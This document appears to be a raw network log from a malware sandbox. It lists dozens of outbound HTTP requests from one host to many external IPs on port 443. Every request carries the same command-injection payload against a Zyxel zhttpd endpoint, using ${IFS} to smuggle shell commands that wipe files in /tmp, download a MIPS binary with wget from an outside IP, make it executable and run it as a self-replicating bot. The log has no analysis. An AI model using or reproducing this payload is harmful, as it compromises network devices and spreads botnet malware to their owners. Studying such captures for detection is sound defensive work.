                                                Jan 28, 2024 10:16:15.661546946 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1863192.168.2.2336736161.13.154.75443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:15.661570072 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1864192.168.2.2336336220.237.67.40443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:15.661600113 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1865192.168.2.233748285.10.108.185443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:15.661632061 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1866192.168.2.23397224.78.65.95443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:15.661654949 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1867192.168.2.233519684.66.43.71443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:15.661658049 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1868192.168.2.2342946130.118.102.86443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:15.661700010 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1869192.168.2.2346458141.4.117.243443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:15.661730051 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1870192.168.2.234606661.0.52.48443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:15.661762953 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1871192.168.2.234975062.202.14.61443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:15.661803007 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1872192.168.2.2355232175.109.227.209443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:15.661823988 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1873192.168.2.2342542152.224.36.220443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:15.661854029 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1874192.168.2.2358408221.61.109.222443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:15.661881924 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1875192.168.2.2356124104.51.168.42443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:15.661907911 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1876192.168.2.235520459.34.222.232443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:15.661936045 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1877192.168.2.233791247.110.136.182443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:15.661951065 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1878192.168.2.234874212.50.82.3443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:15.661972046 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1879192.168.2.2344632178.152.63.113443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:15.662022114 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1880192.168.2.2339950113.253.164.75443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:15.662056923 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1881192.168.2.2352430146.57.75.95443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:15.662090063 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1882192.168.2.233297876.74.28.14443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:15.662091970 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1883192.168.2.23374089.189.49.62443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:15.662131071 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1884192.168.2.233838464.37.122.94443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:15.662163973 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1885192.168.2.2360174188.84.173.9443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:15.662173033 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1886192.168.2.2353596167.243.219.14443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:15.662199974 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1887192.168.2.235832482.171.139.241443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:15.662245989 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1888192.168.2.2360232136.197.151.99443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:15.662256956 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1889192.168.2.2356980193.43.24.160443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:15.662295103 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1890192.168.2.235827640.16.186.30443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:15.662322998 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1891192.168.2.2343616220.97.100.162443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:15.662349939 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1892192.168.2.2343714108.121.112.90443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:15.662380934 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1893192.168.2.2341818108.103.116.70443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:15.662415028 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1894192.168.2.235482261.159.180.18443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:15.662436008 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1895192.168.2.234828074.151.238.13443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:15.662456989 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1896192.168.2.235899251.113.245.252443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:15.662492037 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1897192.168.2.2343162125.110.253.46443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:15.662514925 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1898192.168.2.2336846154.28.84.53443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:15.662549019 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1899192.168.2.2354830151.81.150.120443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:15.662575006 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1900192.168.2.2332880186.151.25.46443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:15.662616014 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1901192.168.2.2355312168.7.4.3443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:15.662642002 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1902192.168.2.2358258154.217.3.22443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:15.662642956 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1903192.168.2.2350250208.124.238.227443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:15.662700891 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1904192.168.2.233621424.85.255.183443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:15.662725925 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1905192.168.2.233635071.218.90.99443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:15.662739992 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1906192.168.2.2346852188.220.62.184443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:15.662782907 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1907192.168.2.2354022157.59.152.143443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:15.662813902 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1908192.168.2.2349654213.8.244.157443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:15.662842989 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1909192.168.2.235530459.227.132.12443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:15.662868977 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1910192.168.2.234602495.166.140.69443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:15.662897110 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1911192.168.2.2334514179.167.97.195443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:15.662918091 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1912192.168.2.2358898211.224.247.46443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:15.662923098 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1913192.168.2.2359616201.109.164.146443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:15.662991047 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1914192.168.2.2344918212.58.20.243443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:15.662991047 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1915192.168.2.2341658192.171.216.147443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:15.663001060 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1916192.168.2.2344932189.89.220.41443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:15.663057089 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1917192.168.2.233667861.234.117.137443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:15.663069010 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1918192.168.2.23546482.16.98.138443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:15.663088083 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1919192.168.2.2345580161.236.129.18443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:15.663111925 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1920192.168.2.234179087.4.49.66443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:15.663151979 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1921192.168.2.2344116105.26.174.227443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:15.663182974 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1922192.168.2.2359214192.117.193.149443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:15.663213968 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1923192.168.2.2344542125.41.193.241443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:15.663270950 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1924192.168.2.2357792160.155.156.211443
                                                TimestampBytes transferredDirectionData
